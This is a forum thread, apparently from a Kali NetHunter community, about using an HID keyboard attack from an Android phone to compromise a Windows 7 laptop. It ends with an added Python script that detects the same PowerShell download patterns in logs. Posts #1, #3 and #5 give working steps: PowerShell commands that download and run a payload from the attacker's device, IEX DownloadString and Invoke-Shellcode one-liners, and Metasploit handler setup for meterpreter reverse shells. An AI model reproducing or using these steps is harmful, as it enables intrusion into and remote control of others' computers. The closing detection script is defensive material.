
Thread: Hid Keyboard, Payload.

  1. #1
    Member
    Join Date
    Mar 2013
    Posts
    95

    Hid Keyboard, Payload.

    I recently, for one reason or another (probably user error), had trouble getting a Windows 7 laptop to accept a payload.
    Having tried various ways and coming up empty-handed, I ended up creating the payload with veil-evasion and hosting it
    in my Nexus #/data/local/kali-armhf/var/www folder.

    I then used the Windows CMD section of HID Keyboard Attack and entered the following; 192.168.0.2 was the IP of my
    Nexus.

    *CD c:/
    Powershell
    $Url='http://192.168.0.2/payload.bat'
    $Path='C:payload.bat'
    $Username=''
    $Password=''

    $WebClient=New-Object System.Net.WebClient
    $WebClient.Credentials=New-Object System.Net.Networkcredential($Username, $Password)
    $WebClient.DownloadFile( $url, $path )

    exit
    payload.bat

    Then I set up the listener on my Kali laptop to wait for a call. I selected Windows 7, ticked Admin, plugged
    in and pressed Execute. The Windows 7 laptop proceeded to download the payload from my Nexus and run it.
    Kali then received a call back straight away. I'm sure this is by far not the best way to do this and it could
    probably be done a lot easier another way, but for me it suited the situation, and I just wanted to share.


    Many thanks.

  2. #2
    Member
    Join Date
    Mar 2014
    Posts
    79
    Would you mind expanding a bit on how to set up the listener?

  3. #3
    Member
    Join Date
    Mar 2013
    Posts
    95
    Sure, I apologise for my terrible writing, I have no excuse.

    Well, first I opened a console and did :- service postgresql start
    Followed by :- msfconsole

    Next I used at the msf prompt :- use exploit/multi/handler
    :- set PAYLOAD windows/meterpreter/reverse_http

    The payload, I guess, really depends on your payload. Anyway, just set your LHOST and LPORT and make sure the relevant ports, if needed, are forwarded in your router.

    Hope this helps; if not, give me another shout. Again, sorry for the terrible writing, it's just not my thing. Cheers

  4. #4
    Junior Member
    Join Date
    Sep 2014
    Posts
    11
    You should post pictures up for everyone to track.

  5. #5
    Junior Member
    Join Date
    Oct 2015
    Posts
    2
    Quote: Originally posted by skycrazy
    Sure, I apologise for my terrible writing, I have no excuse.

    Well, first I opened a console and did :- service postgresql start
    Followed by :- msfconsole

    Next I used at the msf prompt :- use exploit/multi/handler
    :- set PAYLOAD windows/meterpreter/reverse_http

    The payload, I guess, really depends on your payload. Anyway, just set your LHOST and LPORT and make sure the relevant ports, if needed, are forwarded in your router.

    Hope this helps; if not, give me another shout. Again, sorry for the terrible writing, it's just not my thing. Cheers

    I'm having a lot of trouble trying to get HID Keyboard Attack to work; your information was really helpful.

    What I usually do is send the PowerShell to download the file from my NetHunter device (the usual payload), and the system connects fine using the Windows CMD attack. I can't get it to work from the Powersploit.

    c:\>powershell
    PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

    For some reason that I can't understand, the payload from NetHunter is not downloaded from the /var/www/ directory. I found that this file needs to be in the /usr/share/mana-toolkit/www/portal/ directory. If the file is not there the system won't download the file because it can find it.

    When I'm using this

    PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

    Sometimes Meterpreter has problems backgrounding the session, so I end up using


    IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload"); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.1.105 –Lport 4444 –Force

    By the way, I'm supposed to be using NetHunter 2.0.1 on Lollipop, but the NetHunter Home reports Version 1.0.

    Please excuse my poor English.
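
Added example, not part of the thread or any poster's code: a small Python check for the download pattern shown in posts #1 and #5 (a Net.WebClient DownloadFile or DownloadString call, optionally passed to IEX), run over constructed records shaped like PowerShell script block logging (Event ID 4104) text. Hosts, addresses, rule names and function names are assumptions; hits are aggregated per host on the assumption that commands typed one line at a time are logged as separate script blocks.

```python
import re

# Constructed sample records shaped like PowerShell script block logging
# (Event ID 4104) text; hosts and addresses are placeholders, not real data.
SAMPLE_EVENTS = [
    {"host": "WS-01", "text": "$Url='http://192.0.2.10/update.bat'"},
    {"host": "WS-01", "text": "$WebClient=New-Object System.Net.WebClient"},
    {"host": "WS-01", "text": "$WebClient.DownloadFile( $url, $path )"},
    {"host": "WS-02", "text": "I`EX (New-Object Net.WebClient)"
                              ".DownloadString('http://192.0.2.10/p')"},
    {"host": "WS-03", "text": "Get-ChildItem C:\\Users | Sort-Object Name"},
]

# Hypothetical rule names; patterns are matched against normalized text.
RULES = {
    "webclient_object": re.compile(r"new-object\s+(system\.)?net\.webclient"),
    "download_call": re.compile(r"\.download(file|string|data)\s*\("),
    "invoke_expression": re.compile(r"(^|[\s;|(])(iex|invoke-expression)\b"),
    "cleartext_http_url": re.compile(r"http://[^\s'\"]+"),
}

def normalize(text):
    """Lowercase and drop backtick/caret escapes that split keywords."""
    return re.sub(r"[`^]", "", text).lower()

def scan(events):
    """Return {host: sorted rule names}, aggregated over each host's events."""
    hits = {}
    for ev in events:
        norm = normalize(ev["text"])
        for name, rx in RULES.items():
            if rx.search(norm):
                hits.setdefault(ev["host"], set()).add(name)
    return {host: sorted(names) for host, names in hits.items()}

def verdict(rule_names):
    """Rank a host: a download call alone is low, download plus IEX is high."""
    names = set(rule_names)
    if "download_call" not in names:
        return "none"
    if "invoke_expression" in names:
        return "high"    # fetched text is executed in memory
    if {"webclient_object", "cleartext_http_url"} <= names:
        return "medium"  # file fetched over plain HTTP; check for later execution
    return "low"

if __name__ == "__main__":
    for host, names in scan(SAMPLE_EVENTS).items():
        print(host, verdict(names), names)
```
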
